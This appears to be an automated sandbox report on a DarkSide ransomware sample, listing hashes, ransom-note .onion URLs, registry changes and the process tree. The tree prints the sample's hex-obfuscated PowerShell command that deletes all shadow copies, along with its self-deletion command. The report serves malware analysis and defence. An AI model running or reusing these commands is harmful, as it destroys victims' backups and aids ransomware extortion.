Analysis
-
max time kernel
107s -
max time network
107s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
05-06-2023 09:33
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win7-20230220-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\Admin\README.e0af32e7.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (148) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
Darkside.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ShowUnprotect.crw.e0af32e7 Darkside.exe File renamed C:\Users\Admin\Pictures\ShowUnprotect.crw => C:\Users\Admin\Pictures\ShowUnprotect.crw.e0af32e7 Darkside.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 3368 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\e0af32e7.BMP" Darkside.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\e0af32e7.BMP" Darkside.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 1712 Darkside.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
Processes:
Darkside.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\WallpaperStyle = "10" Darkside.exe -
Modifies registry class 6 IoCs
Processes:
Darkside.exerundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\e0af32e7\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\e0af32e7.ico" Darkside.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.e0af32e7 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.e0af32e7\ = "e0af32e7" Darkside.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3336 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeDarkside.exepid process 1836 powershell.exe 1712 Darkside.exe 1712 Darkside.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
Darkside.exepowershell.exevssvc.exeAUDIODG.EXEdescription pid process Token: SeIncreaseQuotaPrivilege 1712 Darkside.exe Token: SeSecurityPrivilege 1712 Darkside.exe Token: SeTakeOwnershipPrivilege 1712 Darkside.exe Token: SeLoadDriverPrivilege 1712 Darkside.exe Token: SeSystemProfilePrivilege 1712 Darkside.exe Token: SeSystemtimePrivilege 1712 Darkside.exe Token: SeProfSingleProcessPrivilege 1712 Darkside.exe Token: SeIncBasePriorityPrivilege 1712 Darkside.exe Token: SeCreatePagefilePrivilege 1712 Darkside.exe Token: SeBackupPrivilege 1712 Darkside.exe Token: SeRestorePrivilege 1712 Darkside.exe Token: SeShutdownPrivilege 1712 Darkside.exe Token: SeDebugPrivilege 1712 Darkside.exe Token: SeSystemEnvironmentPrivilege 1712 Darkside.exe Token: SeRemoteShutdownPrivilege 1712 Darkside.exe Token: SeUndockPrivilege 1712 Darkside.exe Token: SeManageVolumePrivilege 1712 Darkside.exe Token: 33 1712 Darkside.exe Token: 34 1712 Darkside.exe Token: 35 1712 Darkside.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeBackupPrivilege 2012 vssvc.exe Token: SeRestorePrivilege 2012 vssvc.exe Token: SeAuditPrivilege 2012 vssvc.exe Token: 33 1088 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1088 AUDIODG.EXE Token: 33 1088 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1088 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Darkside.exedescription pid process target process PID 1712 wrote to memory of 1836 1712 Darkside.exe powershell.exe PID 1712 wrote to memory of 1836 1712 Darkside.exe powershell.exe PID 1712 wrote to memory of 1836 1712 Darkside.exe powershell.exe PID 1712 wrote to memory of 1836 1712 Darkside.exe powershell.exe PID 1712 wrote to memory of 3368 1712 Darkside.exe cmd.exe PID 1712 wrote to memory of 3368 1712 Darkside.exe cmd.exe PID 1712 wrote to memory of 3368 1712 Darkside.exe cmd.exe PID 1712 wrote to memory of 3368 1712 Darkside.exe cmd.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL2⤵
- Deletes itself
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x54c1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RepairFind.wmx.e0af32e71⤵
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.e0af32e7.TXT1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD562060a21679443e41664019a277272e4
SHA14c794522b7a28277ac4ff894bd66c0677d6041f8
SHA2564b84ec26cbd576e94eb934d5b609ef9f5d790e38709a2ad16978b11dea4c64f8
SHA51241c3cbe5c1bc781117821d4b08617fe333b537b956efc6867b141b8ecec8b58478490ce1620fc971adbd5d6cf4beffa2bcd189bdd7ff61aa45b73af15bfb693d
-
C:\Users\Admin\Desktop\README.e0af32e7.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
C:\Users\Admin\README.e0af32e7.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
memory/1836-59-0x000000001B230000-0x000000001B512000-memory.dmpFilesize
2.9MB
-
memory/1836-60-0x0000000002310000-0x0000000002318000-memory.dmpFilesize
32KB
-
memory/1836-61-0x0000000002420000-0x00000000024A0000-memory.dmpFilesize
512KB
-
memory/1836-62-0x0000000002420000-0x00000000024A0000-memory.dmpFilesize
512KB
-
memory/1836-63-0x0000000002420000-0x00000000024A0000-memory.dmpFilesize
512KB